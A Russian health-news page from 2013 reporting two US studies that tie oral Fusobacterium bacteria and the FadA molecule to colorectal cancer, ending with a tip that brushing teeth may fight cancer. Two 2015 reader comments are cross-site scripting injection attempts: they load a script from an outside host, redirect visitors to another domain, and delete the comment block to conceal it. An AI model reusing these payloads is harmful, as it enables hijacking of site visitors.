Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бактерии во рту приводят ...  >>  Бактерии во рту приводят к раку кишечника
 
Обратная связь
 

Бактерии во рту приводят к раку кишечника

Размер шрифта
08 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые выяснили, что микробы у вас во рту могут запускать сложную цепочку событий, которая в итоге приводит к раку толстой кишки. Речь идет о так называемых фузобактериях – микробах, которые чрезвычайно часто обнаруживаются в ротовой полости. Эти бактерии приводят сверхактивации иммунной системы и запуску генов, которые стимулируют рост рака.

Бактерии во рту приводят к раку кишечника

К таким выводам независимо друг от друга пришли две исследовательские группы из США.

В первой научной работе, которая проводилась в Гарвардском медицинском университете, было показано, что фузобактерии в больших количествах присутствуют в аденомах – доброкочественных новообразованиях толстой кишки, которые со временем могут трансформироваться в рак.

Гарвардские ученые провели ряд экспериментов на мышах, в ходе которых выяснилось, что эти микробы провоцируют опухолевый рост, запуская сложный механизм иммунного воспаления.

Второе исследование проводилось на базе Западного резервного университета Кейза. Ученые анализировали молекулярную структуру фузобактерий, обнаружив в итоге удивительное сродство этих микроорганизмов к клеткам рака толстой кишки. Сродство это обеспечивается наличием особой молекулы на мембране фузобактерий. Она называется FadA. Именно эта молекула запускает опухолевые гены в клетках слизистой кишечника, многократно ускоряя злокачественный процесс. Ученые измерили уровень FadA в тканевых образцах пациентов с раком и обнаружили, что он значительно выше, чем у здоровых людей.

Обнаружение FadA – событие невероятной важности, ведь в перспективе эта молекула может стать эффективной мишенью для противоопухолевых препаратов.

«Наша работа не только проливает свет на патогенез рака толстой кишки, но и является мощным фундаментом для грядущих фармакологических исследований», – утверждает доктор Венди Гаррет, глава гарвардской группы.

Она также добавляет, что в будущем измерение количества фузобактерий в опухолевой массе может стать важным показателем, влияющим на лечебную тактику.

«В нашем организме живет гигантское количество микробов. Некоторые из них полезны, другие – вредны. Известно много онкологических заболеваний, в основе которых лежит инфекционный процесс, и данная работа наших американских коллег является замечательным дополнением к этой области знаний», – говорит Оливер Чайлдс, профессор Британского института по изучению рака. «И если эти результаты подтвердятся в более крупномасштабных исследованиях, то, вне всякого сомнения, мы станем свидетелями революции в диагностике и лечении рака толстой кишки».

Поэтому почаще чистите зубы – это, возможно, лучший способ борьбы с раком!

Результаты данного исследования были опубликованы в журнале

Cell Host & Microbe.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

08 октября 2013 в 20:09

Цитировать   |   Пожаловаться

Increasing evidence links the gut microbiota with
colorectal cancer. Metagenomic analyses indicate
that symbiotic Fusobacterium spp. are associated
with human colorectal carcinoma, but whether this
is an indirect or causal link remains unclear.

2 - zzzzzz

30 июня 2015 в 19:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Узнайте, будет ли у вас рак в течение 10 лет   Кто живет внутри вас? Бактерии! Да еще приводят к раку!   Что общего у тухлых яиц и рака кишечника?   Соевые продукты не просто уменьшают риск рака, но и количество метастазов почти на 100%  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Супереда для супериммунитета этой зимой!
Ужасы раздевалки
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.